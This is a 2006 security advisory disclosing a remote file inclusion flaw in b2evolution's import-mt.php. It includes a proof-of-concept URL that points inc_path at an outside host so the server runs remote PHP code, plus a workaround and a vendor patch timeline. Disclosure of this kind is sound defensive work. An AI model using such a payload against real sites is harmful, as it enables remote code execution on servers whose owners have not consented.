b2evolution-rfi.txt

2006-12-01T00:00:00
ID PACKETSTORM:52624
Type packetstorm
Reporter tarkus
Modified 2006-12-01T00:00:00

Description

                                        
                                            `_________________________________________  
_________________________________________  
  
Severity: High  
Title: b2evolution Remote File inclusion Vulnerability  
Date: 28.11.06  
Author: tarkus (tarkus (at) tiifp (dot) org)  
Web: https://tiifp.org/tarkus  
Vendor: b2evolution (http://b2evolution.net/)  
Affected Product(s): b2evolution 1.8.5 - 1.9 beta  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
Description:  
------------  
  
Line 67 of import-mt.php (blogs/inc/CONTROL/imports):  
  
>  
>require_once $inc_path.'MODEL/files/_file.funcs.php';  
>  
  
  
  
PoC:  
----  
  
http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= \  
foo&inc_path=https://tiifp.org/tarkus/PoC/  
  
register_globals and allow_url_fopen have to be On  
  
  
Workaround:  
-----------  
  
Put the following line at the beginning of the file.  
  
if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \  
directly.' );  
  
  
  
Vendor Response:  
----------------  
  
Reported to Vendor: 10.11.06  
Vendor response: 10.11.06  
Patch in CVS: 10.11.06  
  
`